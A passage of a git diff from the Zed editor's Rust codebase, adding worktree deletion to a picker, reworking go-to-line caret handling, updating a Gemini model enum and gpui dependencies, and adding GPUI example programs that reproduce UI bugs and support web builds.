else { + return; + }; + if !entry.can_delete(self.forbidden_deletion_path.as_ref()) { + return; + } + let Some(repo) = self.repo.clone() else { + return; + }; + let workspace = self.workspace.clone(); + let path = entry.worktree.path; + + cx.spawn_in(window, async move |picker, cx| { + let result = repo + .update(cx, |repo, _| repo.remove_worktree(path.clone(), false)) + .await?; + + if let Err(e) = result { + log::error!("Failed to remove worktree: {}", e); + if let Some(workspace) = workspace.upgrade() { + cx.update(|_window, cx| { + show_error_toast( + workspace, + format!("worktree remove {}", path.display()), + e, + cx, + ) + })?; + } + return Ok(()); + } + + picker.update_in(cx, |picker, _, cx| { + picker.delegate.matches.retain(|e| e.worktree.path != path); + if let Some(all_worktrees) = &mut picker.delegate.all_worktrees { + all_worktrees.retain(|w| w.path != path); + } + picker.delegate.refresh_forbidden_deletion_path(cx); + if picker.delegate.matches.is_empty() { + picker.delegate.selected_index = 0; + } else if picker.delegate.selected_index >= picker.delegate.matches.len() { + picker.delegate.selected_index = picker.delegate.matches.len() - 1; + } + cx.notify(); + })?; + + anyhow::Ok(()) + }) + .detach(); + } + + fn refresh_forbidden_deletion_path(&mut self, cx: &App) { + let Some(workspace) = self.workspace.upgrade() else { + debug_panic!("Workspace should always be available or else the picker would be closed"); + self.forbidden_deletion_path = None; + return; + }; + + let visible_worktree_paths = workspace.read_with(cx, |workspace, cx| { + workspace + .project() + .read(cx) + .visible_worktrees(cx) + .map(|worktree| worktree.read(cx).abs_path().to_path_buf()) + .collect::>() + }); + + self.forbidden_deletion_path = if visible_worktree_paths.len() == 1 { + visible_worktree_paths.into_iter().next() + } else { + None + }; + } } async fn open_remote_worktree( @@ -574,7 +694,7 @@ impl PickerDelegate for WorktreeListDelegate { let candidates = all_worktrees .iter() .enumerate() - .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.branch())) + .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.display_name())) .collect::>(); fuzzy::match_strings( &candidates, @@ -599,14 +719,15 @@ impl PickerDelegate for WorktreeListDelegate { if !query.is_empty() && !matches .first() - .is_some_and(|entry| entry.worktree.branch() == query) + .is_some_and(|entry| entry.worktree.display_name() == query) { let query = query.replace(' ', "-"); matches.push(WorktreeEntry { worktree: GitWorktree { path: Default::default(), - ref_name: format!("refs/heads/{query}").into(), + ref_name: Some(format!("refs/heads/{query}").into()), sha: Default::default(), + is_main: false, }, positions: Vec::new(), is_new: true, @@ -631,9 +752,9 @@ impl PickerDelegate for WorktreeListDelegate { return; }; if entry.is_new { - self.create_worktree(&entry.worktree.branch(), secondary, None, window, cx); + self.create_worktree(&entry.worktree.display_name(), secondary, None, window, cx); } else { - self.open_worktree(&entry.worktree.path, secondary, window, cx); + self.open_worktree(&entry.worktree.path, !secondary, window, cx); } cx.emit(DismissEvent); @@ -662,16 +783,19 @@ impl PickerDelegate for WorktreeListDelegate { let (branch_name, sublabel) = if entry.is_new { ( - Label::new(format!("Create Worktree: \"{}\"…", entry.worktree.branch())) - .truncate() - .into_any_element(), + Label::new(format!( + "Create Worktree: \"{}\"…", + entry.worktree.display_name() + )) + .truncate() + .into_any_element(), format!( "based off {}", self.base_branch(cx).unwrap_or("the current branch") ), ) } else { - let branch = entry.worktree.branch(); + let branch = entry.worktree.display_name(); let branch_first_line = branch.lines().next().unwrap_or(branch); let positions: Vec<_> = entry .positions @@ -688,38 +812,103 @@ impl PickerDelegate for WorktreeListDelegate { ) }; + let focus_handle = self.focus_handle.clone(); + + let can_delete = entry.can_delete(self.forbidden_deletion_path.as_ref()); + + let delete_button = |entry_ix: usize| { + IconButton::new(("delete-worktree", entry_ix), IconName::Trash) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Delete Worktree", &DeleteWorktree, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.delete_at(entry_ix, window, cx); + })) + }; + + let entry_icon = if entry.is_new { + IconName::Plus + } else { + IconName::GitWorktree + }; + Some( ListItem::new(format!("worktree-menu-{ix}")) .inset(true) .spacing(ListItemSpacing::Sparse) .toggle_state(selected) .child( - v_flex() + h_flex() .w_full() + .gap_2p5() .child( - h_flex() - .gap_2() - .justify_between() - .overflow_x_hidden() - .child(branch_name) - .when(!entry.is_new, |this| { - this.child( - Label::new(sha) - .size(LabelSize::Small) - .color(Color::Muted) - .buffer_font(cx) - .into_element(), - ) - }), - ) - .child( - Label::new(sublabel) - .size(LabelSize::Small) + Icon::new(entry_icon) .color(Color::Muted) - .truncate() - .into_any_element(), - ), - ), + .size(IconSize::Small), + ) + .child(v_flex().w_full().child(branch_name).map(|this| { + if entry.is_new { + this.child( + Label::new(sublabel) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate(), + ) + } else { + this.child( + h_flex() + .w_full() + .min_w_0() + .gap_1p5() + .child( + Label::new(sha) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("•") + .alpha(0.5) + .color(Color::Muted) + .size(LabelSize::Small), + ) + .child( + Label::new(sublabel) + .truncate() + .color(Color::Muted) + .size(LabelSize::Small) + .flex_1(), + ) + .into_any_element(), + ) + } + })), + ) + .when(!entry.is_new, |this| { + let focus_handle = self.focus_handle.clone(); + let open_in_new_window_button = + IconButton::new(("open-new-window", ix), IconName::ArrowUpRight) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Open in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + }) + .on_click(|_, window, cx| { + window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx); + }); + + this.end_slot( + h_flex() + .gap_0p5() + .child(open_in_new_window_button) + .when(can_delete, |this| this.child(delete_button(ix))), + ) + .show_end_slot_on_hover() + }), ) } @@ -731,6 +920,8 @@ impl PickerDelegate for WorktreeListDelegate { let focus_handle = self.focus_handle.clone(); let selected_entry = self.matches.get(self.selected_index); let is_creating = selected_entry.is_some_and(|entry| entry.is_new); + let can_delete = selected_entry + .is_some_and(|entry| entry.can_delete(self.forbidden_deletion_path.as_ref())); let footer_container = h_flex() .w_full() @@ -778,18 +969,20 @@ impl PickerDelegate for WorktreeListDelegate { } else { Some( footer_container + .when(can_delete, |this| { + this.child( + Button::new("delete-worktree", "Delete") + .key_binding( + KeyBinding::for_action_in(&DeleteWorktree, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action(DeleteWorktree.boxed_clone(), cx) + }), + ) + }) .child( Button::new("open-in-new-window", "Open in New Window") - .key_binding( - KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(12.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action(menu::Confirm.boxed_clone(), cx) - }), - ) - .child( - Button::new("open-in-window", "Open") .key_binding( KeyBinding::for_action_in( &menu::SecondaryConfirm, @@ -802,6 +995,16 @@ impl PickerDelegate for WorktreeListDelegate { window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx) }), ) + .child( + Button::new("open-in-window", "Open") + .key_binding( + KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action(menu::Confirm.boxed_clone(), cx) + }), + ) .into_any(), ) } diff --git a/crates/go_to_line/Cargo.toml b/crates/go_to_line/Cargo.toml index 0260cd2d122f83f2c11505be9e6e8a84f69f8569..c07656985380c93355a4c8429dcf1135acf93d56 100644 --- a/crates/go_to_line/Cargo.toml +++ b/crates/go_to_line/Cargo.toml @@ -17,6 +17,7 @@ editor.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true +multi_buffer.workspace = true serde.workspace = true settings.workspace = true text.workspace = true @@ -34,6 +35,4 @@ menu.workspace = true project = { workspace = true, features = ["test-support"] } rope.workspace = true serde_json.workspace = true -tree-sitter-rust.workspace = true -tree-sitter-typescript.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/go_to_line/src/cursor_position.rs b/crates/go_to_line/src/cursor_position.rs index 042d9a46b6c76a461e60d9002a2362190e253cd4..03bec51ac209fd6e3c254689b3b7caa2695fa450 100644 --- a/crates/go_to_line/src/cursor_position.rs +++ b/crates/go_to_line/src/cursor_position.rs @@ -42,23 +42,22 @@ impl UserCaretPosition { snapshot: &MultiBufferSnapshot, ) -> Self { let selection_end = selection.head(); - let (line, character) = if let Some((buffer_snapshot, point, _)) = - snapshot.point_to_buffer_point(selection_end) - { - let line_start = Point::new(point.row, 0); + let (line, character) = + if let Some((buffer_snapshot, point)) = snapshot.point_to_buffer_point(selection_end) { + let line_start = Point::new(point.row, 0); - let chars_to_last_position = buffer_snapshot - .text_summary_for_range::(line_start..point) - .chars as u32; - (line_start.row, chars_to_last_position) - } else { - let line_start = Point::new(selection_end.row, 0); + let chars_to_last_position = buffer_snapshot + .text_summary_for_range::(line_start..point) + .chars as u32; + (line_start.row, chars_to_last_position) + } else { + let line_start = Point::new(selection_end.row, 0); - let chars_to_last_position = snapshot - .text_summary_for_range::(line_start..selection_end) - .chars as u32; - (selection_end.row, chars_to_last_position) - }; + let chars_to_last_position = snapshot + .text_summary_for_range::(line_start..selection_end) + .chars as u32; + (selection_end.row, chars_to_last_position) + }; Self { line: NonZeroU32::new(line + 1).expect("added 1"), @@ -232,7 +231,7 @@ impl Render for CursorPosition { if let Some(editor) = workspace .active_item(cx) .and_then(|item| item.act_as::(cx)) - && let Some((_, buffer, _)) = editor.read(cx).active_excerpt(cx) + && let Some(buffer) = editor.read(cx).active_buffer(cx) { workspace.toggle_modal(window, cx, |window, cx| { crate::GoToLine::new(editor, buffer, window, cx) diff --git a/crates/go_to_line/src/go_to_line.rs b/crates/go_to_line/src/go_to_line.rs index 662bf2a98d84ba434da98aeca71791c028f6018c..561d6a7d31398ab2a8eb74042fc1a617b7159d33 100644 --- a/crates/go_to_line/src/go_to_line.rs +++ b/crates/go_to_line/src/go_to_line.rs @@ -2,7 +2,7 @@ pub mod cursor_position; use cursor_position::UserCaretPosition; use editor::{ - Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToOffset, ToPoint, + Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToPoint, actions::Tab, scroll::{Autoscroll, ScrollOffset}, }; @@ -11,6 +11,7 @@ use gpui::{ Subscription, div, prelude::*, }; use language::Buffer; +use multi_buffer::MultiBufferRow; use text::{Bias, Point}; use theme::ActiveTheme; use ui::prelude::*; @@ -62,7 +63,7 @@ impl GoToLine { return; }; let editor = editor_handle.read(cx); - let Some((_, buffer, _)) = editor.active_excerpt(cx) else { + let Some(buffer) = editor.active_buffer(cx) else { return; }; workspace.update(cx, |workspace, cx| { @@ -92,9 +93,9 @@ impl GoToLine { let last_line = editor .buffer() .read(cx) - .excerpts_for_buffer(snapshot.remote_id(), cx) - .into_iter() - .map(move |(_, range)| text::ToPoint::to_point(&range.context.end, &snapshot).row) + .snapshot(cx) + .excerpts_for_buffer(snapshot.remote_id()) + .map(move |range| text::ToPoint::to_point(&range.context.end, &snapshot).row) .max() .unwrap_or(0); @@ -226,31 +227,14 @@ impl GoToLine { let row = query_row.saturating_sub(1); let character = query_char.unwrap_or(0).saturating_sub(1); - let start_offset = Point::new(row, 0).to_offset(snapshot); - const MAX_BYTES_IN_UTF_8: u32 = 4; - let max_end_offset = snapshot - .clip_point( - Point::new(row, character * MAX_BYTES_IN_UTF_8 + 1), - Bias::Right, - ) - .to_offset(snapshot); - - let mut chars_to_iterate = character; - let mut end_offset = start_offset; - 'outer: for text_chunk in snapshot.text_for_range(start_offset..max_end_offset) { - let mut offset_increment = 0; - for c in text_chunk.chars() { - if chars_to_iterate == 0 { - end_offset += offset_increment; - break 'outer; - } else { - chars_to_iterate -= 1; - offset_increment += c.len_utf8(); - } - } - end_offset += offset_increment; - } - Some(snapshot.anchor_before(snapshot.clip_offset(end_offset, Bias::Left))) + let target_multi_buffer_row = MultiBufferRow(row); + let (buffer_snapshot, target_in_buffer) = snapshot.point_to_buffer_point(Point::new( + target_multi_buffer_row.min(snapshot.max_row()).0, + 0, + ))?; + let target_point = + buffer_snapshot.point_from_external_input(target_in_buffer.row, character); + Some(snapshot.anchor_before(target_point)) } fn relative_line_from_query(&self, cx: &App) -> Option { diff --git a/crates/google_ai/src/google_ai.rs b/crates/google_ai/src/google_ai.rs index 3a686f97a8825b30a8f02f4149b110c3d1aacb1e..7659be8ab44da35efd16389c4abd0bf99d8cf3a4 100644 --- a/crates/google_ai/src/google_ai.rs +++ b/crates/google_ai/src/google_ai.rs @@ -510,11 +510,9 @@ pub enum Model { alias = "gemini-2.5-pro-preview-06-05" )] Gemini25Pro, - #[serde(rename = "gemini-3-pro-preview")] - Gemini3Pro, #[serde(rename = "gemini-3-flash-preview")] Gemini3Flash, - #[serde(rename = "gemini-3.1-pro-preview")] + #[serde(rename = "gemini-3.1-pro-preview", alias = "gemini-3-pro-preview")] Gemini31Pro, #[serde(rename = "custom")] Custom { @@ -537,7 +535,6 @@ impl Model { Self::Gemini25FlashLite => "gemini-2.5-flash-lite", Self::Gemini25Flash => "gemini-2.5-flash", Self::Gemini25Pro => "gemini-2.5-pro", - Self::Gemini3Pro => "gemini-3-pro-preview", Self::Gemini3Flash => "gemini-3-flash-preview", Self::Gemini31Pro => "gemini-3.1-pro-preview", Self::Custom { name, .. } => name, @@ -548,7 +545,6 @@ impl Model { Self::Gemini25FlashLite => "gemini-2.5-flash-lite", Self::Gemini25Flash => "gemini-2.5-flash", Self::Gemini25Pro => "gemini-2.5-pro", - Self::Gemini3Pro => "gemini-3-pro-preview", Self::Gemini3Flash => "gemini-3-flash-preview", Self::Gemini31Pro => "gemini-3.1-pro-preview", Self::Custom { name, .. } => name, @@ -560,7 +556,6 @@ impl Model { Self::Gemini25FlashLite => "Gemini 2.5 Flash-Lite", Self::Gemini25Flash => "Gemini 2.5 Flash", Self::Gemini25Pro => "Gemini 2.5 Pro", - Self::Gemini3Pro => "Gemini 3 Pro", Self::Gemini3Flash => "Gemini 3 Flash", Self::Gemini31Pro => "Gemini 3.1 Pro", Self::Custom { @@ -574,7 +569,6 @@ impl Model { Self::Gemini25FlashLite | Self::Gemini25Flash | Self::Gemini25Pro - | Self::Gemini3Pro | Self::Gemini3Flash | Self::Gemini31Pro => 1_048_576, Self::Custom { max_tokens, .. } => *max_tokens, @@ -586,7 +580,6 @@ impl Model { Model::Gemini25FlashLite | Model::Gemini25Flash | Model::Gemini25Pro - | Model::Gemini3Pro | Model::Gemini3Flash | Model::Gemini31Pro => Some(65_536), Model::Custom { .. } => None, @@ -603,10 +596,7 @@ impl Model { pub fn mode(&self) -> GoogleModelMode { match self { - Self::Gemini25FlashLite - | Self::Gemini25Flash - | Self::Gemini25Pro - | Self::Gemini3Pro => { + Self::Gemini25FlashLite | Self::Gemini25Flash | Self::Gemini25Pro => { GoogleModelMode::Thinking { // By default these models are set to "auto", so we preserve that behavior // but indicate they are capable of thinking mode diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 4bd9510eac1710554f8eec52f22609db31c531ad..915f0fc03e2cc5beaf40c810654724295c41cde8 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -24,6 +24,7 @@ test-support = [ "http_client/test-support", "wayland", "x11", + "proptest", ] inspector = ["gpui_macros/inspector"] leak-detection = ["backtrace"] @@ -64,18 +65,22 @@ num_cpus = "1.13" parking = "2.0.0" parking_lot.workspace = true postage.workspace = true +proptest = { workspace = true, optional = true } chrono.workspace = true profiling.workspace = true rand.workspace = true raw-window-handle = "0.6" +regex.workspace = true refineable.workspace = true scheduler.workspace = true resvg = { version = "0.45.0", default-features = false, features = [ "text", "system-fonts", "memmap-fonts", + "raster-images" ] } usvg = { version = "0.45.0", default-features = false } +ttf-parser = "0.25" util_macros.workspace = true schemars.workspace = true seahash = "4.1" @@ -93,7 +98,6 @@ gpui_util.workspace = true waker-fn = "1.2.0" lyon = "1.0" pin-project = "1.1.10" -circular-buffer.workspace = true spin = "0.10.0" pollster.workspace = true url.workspace = true @@ -142,13 +146,13 @@ windows = { version = "0.61", features = ["Win32_Foundation"] } backtrace.workspace = true collections = { workspace = true, features = ["test-support"] } env_logger.workspace = true -gpui_platform.workspace = true +gpui_platform = { workspace = true, features = ["font-kit"] } +gpui_util = { workspace = true } lyon = { version = "1.0", features = ["extra"] } -pretty_assertions.workspace = true +proptest = { workspace = true } rand.workspace = true scheduler = { workspace = true, features = ["test-support"] } -unicode-segmentation.workspace = true -gpui_util = { workspace = true } +unicode-segmentation = { workspace = true } [target.'cfg(not(target_family = "wasm"))'.dev-dependencies] http_client = { workspace = true, features = ["test-support"] } @@ -156,6 +160,7 @@ reqwest_client = { workspace = true, features = ["test-support"] } [target.'cfg(target_family = "wasm")'.dev-dependencies] wasm-bindgen = { workspace = true } +gpui_web.workspace = true [build-dependencies] embed-resource = { version = "3.0", optional = true } @@ -232,6 +237,10 @@ path = "examples/window_shadow.rs" name = "grid_layout" path = "examples/grid_layout.rs" +[[example]] +name = "list_example" +path = "examples/list_example.rs" + [[example]] name = "mouse_pressure" path = "examples/mouse_pressure.rs" diff --git a/crates/gpui/examples/active_state_bug.rs b/crates/gpui/examples/active_state_bug.rs new file mode 100644 index 0000000000000000000000000000000000000000..f767ed27e456ec65858b72a4df89fab65e7fd1f3 --- /dev/null +++ b/crates/gpui/examples/active_state_bug.rs @@ -0,0 +1,47 @@ +/// Click the button — the `.active()` background gets stuck on every other click. +use gpui::*; +use gpui_platform::application; + +struct Example; + +impl Render for Example { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + // Colors from Zed's default dark theme + let bg = hsla(215. / 360., 0.12, 0.15, 1.); + let text = hsla(221. / 360., 0.11, 0.86, 1.); + let hover = hsla(225. / 360., 0.118, 0.267, 1.); + let active = hsla(220. / 360., 0.118, 0.20, 1.); + + div().bg(bg).size_full().p_1().child( + div() + .id("button") + .px_2() + .py_0p5() + .rounded_md() + .text_sm() + .text_color(text) + .hover(|s| s.bg(hover)) + .active(|s| s.bg(active)) + .on_click(|_, _, _| {}) + .child("Click me"), + ) + } +} + +fn main() { + application().run(|cx: &mut App| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(Bounds::centered( + None, + size(px(200.), px(60.)), + cx, + ))), + ..Default::default() + }, + |_, cx| cx.new(|_| Example), + ) + .unwrap(); + cx.activate(true); + }); +} diff --git a/crates/gpui/examples/image/image.rs b/crates/gpui/examples/image/image.rs index cf879ba281e18521883222fba54451bb143fae29..45fce26d046c17b716f1644757ef26978f23b6d6 100644 --- a/crates/gpui/examples/image/image.rs +++ b/crates/gpui/examples/image/image.rs @@ -10,7 +10,7 @@ use gpui::{ SharedString, SharedUri, TitlebarOptions, Window, WindowBounds, WindowOptions, actions, div, img, prelude::*, px, rgb, size, }; -use gpui_platform::application; +#[cfg(not(target_family = "wasm"))] use reqwest_client::ReqwestClient; struct Assets { @@ -151,47 +151,64 @@ actions!(image, [Quit]); fn run_example() { let manifest_dir = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - application() - .with_assets(Assets { - base: manifest_dir.join("examples"), - }) - .run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + let app = gpui_platform::application(); + #[cfg(target_family = "wasm")] + let app = gpui_platform::application(); + app.with_assets(Assets { + base: manifest_dir.join("examples"), + }) + .run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + { let http_client = ReqwestClient::user_agent("gpui example").unwrap(); cx.set_http_client(Arc::new(http_client)); - - cx.activate(true); - cx.on_action(|_: &Quit, cx| cx.quit()); - cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Image".into(), - items: vec![MenuItem::action("Quit", Quit)], - }]); - - let window_options = WindowOptions { - titlebar: Some(TitlebarOptions { - title: Some(SharedString::from("Image Example")), - appears_transparent: false, - ..Default::default() - }), - - window_bounds: Some(WindowBounds::Windowed(Bounds { - size: size(px(1100.), px(600.)), - origin: Point::new(px(200.), px(200.)), - })), - - ..Default::default() + } + #[cfg(target_family = "wasm")] + { + // Safety: the web examples run single-threaded; the client is + // created and used exclusively on the main thread. + let http_client = unsafe { + gpui_web::FetchHttpClient::with_user_agent("gpui example") + .expect("failed to create FetchHttpClient") }; + cx.set_http_client(Arc::new(http_client)); + } - cx.open_window(window_options, |_, cx| { - cx.new(|_| ImageShowcase { - // Relative path to your root project path - local_resource: manifest_dir.join("examples/image/app-icon.png").into(), - remote_resource: "https://picsum.photos/800/400".into(), - asset_resource: "image/color.svg".into(), - }) + cx.activate(true); + cx.on_action(|_: &Quit, cx| cx.quit()); + cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); + cx.set_menus(vec![Menu { + name: "Image".into(), + items: vec![MenuItem::action("Quit", Quit)], + disabled: false, + }]); + + let window_options = WindowOptions { + titlebar: Some(TitlebarOptions { + title: Some(SharedString::from("Image Example")), + appears_transparent: false, + ..Default::default() + }), + + window_bounds: Some(WindowBounds::Windowed(Bounds { + size: size(px(1100.), px(600.)), + origin: Point::new(px(200.), px(200.)), + })), + + ..Default::default() + }; + + cx.open_window(window_options, |_, cx| { + cx.new(|_| ImageShowcase { + // Relative path to your root project path + local_resource: manifest_dir.join("examples/image/app-icon.png").into(), + remote_resource: "https://picsum.photos/800/400".into(), + asset_resource: "image/color.svg".into(), }) - .unwrap(); - }); + }) + .unwrap(); + }); } #[cfg(not(target_family = "wasm"))] diff --git a/crates/gpui/examples/image_gallery.rs b/crates/gpui/examples/image_gallery.rs index eba3fc0b6444c1b02ed8d6d2437505f1d341e605..bc5cda396c3c37a1ac92bb11abf2f5d57673765e 100644 --- a/crates/gpui/examples/image_gallery.rs +++ b/crates/gpui/examples/image_gallery.rs @@ -7,7 +7,7 @@ use gpui::{ RetainAllImageCache, SharedString, TitlebarOptions, Window, WindowBounds, WindowOptions, actions, div, hash, image_cache, img, prelude::*, px, rgb, size, }; -use gpui_platform::application; +#[cfg(not(target_family = "wasm"))] use reqwest_client::ReqwestClient; use std::{collections::HashMap, sync::Arc}; @@ -248,17 +248,32 @@ impl ImageCache for SimpleLruCache { actions!(image, [Quit]); fn run_example() { - application().run(move |cx: &mut App| { - let http_client = ReqwestClient::user_agent("gpui example").unwrap(); - cx.set_http_client(Arc::new(http_client)); + #[cfg(not(target_family = "wasm"))] + let app = gpui_platform::application(); + #[cfg(target_family = "wasm")] + let app = gpui_platform::single_threaded_web(); + + app.run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + { + let http_client = ReqwestClient::user_agent("gpui example").unwrap(); + cx.set_http_client(Arc::new(http_client)); + } + #[cfg(target_family = "wasm")] + { + // Safety: the web examples run single-threaded; the client is + // created and used exclusively on the main thread. + let http_client = unsafe { + gpui_web::FetchHttpClient::with_user_agent("gpui example") + .expect("failed to create FetchHttpClient") + }; + cx.set_http_client(Arc::new(http_client)); + } cx.activate(true); cx.on_action(|_: &Quit, cx| cx.quit()); cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Image Gallery".into(), - items: vec![MenuItem::action("Quit", Quit)], - }]); + cx.set_menus([Menu::new("Image Gallery").items([MenuItem::action("Quit", Quit)])]); let window_options = WindowOptions { titlebar: Some(TitlebarOptions { diff --git a/crates/gpui/examples/input.rs b/crates/gpui/examples/input.rs index d15d791cd008883506389cc7bb16dbad765969c0..370e27de7d54c317af6683c240f343e750c68698 100644 --- a/crates/gpui/examples/input.rs +++ b/crates/gpui/examples/input.rs @@ -85,14 +85,24 @@ impl TextInput { fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { if self.selected_range.is_empty() { - self.select_to(self.previous_boundary(self.cursor_offset()), cx) + let prev = self.previous_boundary(self.cursor_offset()); + if self.cursor_offset() == prev { + window.play_system_bell(); + return; + } + self.select_to(prev, cx) } self.replace_text_in_range(None, "", window, cx) } fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { if self.selected_range.is_empty() { - self.select_to(self.next_boundary(self.cursor_offset()), cx) + let next = self.next_boundary(self.cursor_offset()); + if self.cursor_offset() == next { + window.play_system_bell(); + return; + } + self.select_to(next, cx) } self.replace_text_in_range(None, "", window, cx) } diff --git a/crates/gpui/examples/list_example.rs b/crates/gpui/examples/list_example.rs new file mode 100644 index 0000000000000000000000000000000000000000..7aeff7c24ec3755edf1e37f5ff1cc496c9fb597e --- /dev/null +++ b/crates/gpui/examples/list_example.rs @@ -0,0 +1,170 @@ +#![cfg_attr(target_family = "wasm", no_main)] + +use gpui::{ + App, Bounds, Context, ListAlignment, ListState, Render, Window, WindowBounds, WindowOptions, + div, list, prelude::*, px, rgb, size, +}; +use gpui_platform::application; + +const ITEM_COUNT: usize = 40; +const SCROLLBAR_WIDTH: f32 = 12.; + +struct BottomListDemo { + list_state: ListState, +} + +impl BottomListDemo { + fn new() -> Self { + Self { + list_state: ListState::new(ITEM_COUNT, ListAlignment::Bottom, px(500.)).measure_all(), + } + } +} + +impl Render for BottomListDemo { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + let max_offset = self.list_state.max_offset_for_scrollbar().y; + let current_offset = -self.list_state.scroll_px_offset_for_scrollbar().y; + + let viewport_height = self.list_state.viewport_bounds().size.height; + + let raw_fraction = if max_offset > px(0.) { + current_offset / max_offset + } else { + 0. + }; + + let total_height = viewport_height + max_offset; + let thumb_height = if total_height > px(0.) { + px(viewport_height.as_f32() * viewport_height.as_f32() / total_height.as_f32()) + .max(px(30.)) + } else { + px(30.) + }; + + let track_space = viewport_height - thumb_height; + let thumb_top = track_space * raw_fraction; + + let bug_detected = raw_fraction > 1.0; + + div() + .size_full() + .bg(rgb(0xFFFFFF)) + .flex() + .flex_col() + .p_4() + .gap_2() + .child( + div() + .text_sm() + .flex() + .flex_col() + .gap_1() + .child(format!( + "offset: {:.0} / max: {:.0} | fraction: {:.3}", + current_offset.as_f32(), + max_offset.as_f32(), + raw_fraction, + )) + .child( + div() + .text_color(if bug_detected { + rgb(0xCC0000) + } else { + rgb(0x008800) + }) + .child(if bug_detected { + format!( + "BUG: fraction is {:.3} (> 1.0) — thumb is off-track!", + raw_fraction + ) + } else { + "OK: fraction <= 1.0 — thumb is within track.".to_string() + }), + ), + ) + .child( + div() + .flex_1() + .flex() + .flex_row() + .overflow_hidden() + .border_1() + .border_color(rgb(0xCCCCCC)) + .rounded_sm() + .child( + list(self.list_state.clone(), |index, _window, _cx| { + let height = px(30. + (index % 5) as f32 * 10.); + div() + .h(height) + .w_full() + .flex() + .items_center() + .px_3() + .border_b_1() + .border_color(rgb(0xEEEEEE)) + .bg(if index % 2 == 0 { + rgb(0xFAFAFA) + } else { + rgb(0xFFFFFF) + }) + .text_sm() + .child(format!("Item {index}")) + .into_any() + }) + .flex_1(), + ) + // Scrollbar track + .child( + div() + .w(px(SCROLLBAR_WIDTH)) + .h_full() + .flex_shrink_0() + .bg(rgb(0xE0E0E0)) + .relative() + .child( + // Thumb — position is unclamped to expose the bug + div() + .absolute() + .top(thumb_top) + .w_full() + .h(thumb_height) + .bg(if bug_detected { + rgb(0xCC0000) + } else { + rgb(0x888888) + }) + .rounded_sm(), + ), + ), + ) + } +} + +fn run_example() { + application().run(|cx: &mut App| { + let bounds = Bounds::centered(None, size(px(400.), px(500.)), cx); + cx.open_window( + WindowOptions { + focus: true, + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |_, cx| cx.new(|_| BottomListDemo::new()), + ) + .unwrap(); + cx.activate(true); + }); +} + +#[cfg(not(target_family = "wasm"))] +fn main() { + run_example(); +} + +#[cfg(target_family = "wasm")] +#[wasm_bindgen::prelude::wasm_bindgen(start)] +pub fn start() { + gpui_platform::web_init(); + run_example(); +} diff --git a/crates/gpui/examples/on_window_close_quit.rs b/crates/gpui/examples/on_window_close_quit.rs index e71a142d991c87ccbccb9c078fdb50d1fa3dba49..347401c6d924f146fec539c862878d21c4b18e67 100644 --- a/crates/gpui/examples/on_window_close_quit.rs +++ b/crates/gpui/examples/on_window_close_quit.rs @@ -42,7 +42,7 @@ fn run_example() { let mut bounds = Bounds::centered(None, size(px(500.), px(500.0)), cx); cx.bind_keys([KeyBinding::new("cmd-w", CloseWindow, None)]); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } diff --git a/crates/gpui/examples/painting.rs b/crates/gpui/examples/painting.rs index 18ef6b9fa3741297ddfebc1b5df3ea4a3594fc05..11c3b333717c6b816cdf2f7d5170ceae0cfd1b1f 100644 --- a/crates/gpui/examples/painting.rs +++ b/crates/gpui/examples/painting.rs @@ -457,7 +457,7 @@ fn run_example() { |window, cx| cx.new(|cx| PaintingViewer::new(window, cx)), ) .unwrap(); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { cx.quit(); }) .detach(); diff --git a/crates/gpui/examples/popover.rs b/crates/gpui/examples/popover.rs index bd112b0e69a62c1303e9d90945e24cfb3f659b82..9d5f84a1f43462e6e49ec5b0984dbd7b1c50230a 100644 --- a/crates/gpui/examples/popover.rs +++ b/crates/gpui/examples/popover.rs @@ -56,21 +56,23 @@ impl HelloWorld { })) .when(self.secondary_open, |this| { this.child( - // GPUI can't support deferred here yet, - // it was inside another deferred element. - anchored() - .anchor(Corner::TopLeft) - .snap_to_window_with_margin(px(8.)) - .child( - popover() - .child("This is second level Popover") - .bg(gpui::white()) - .border_color(gpui::blue()) - .on_mouse_down_out(cx.listener(|this, _, _, cx| { - this.secondary_open = false; - cx.notify(); - })), 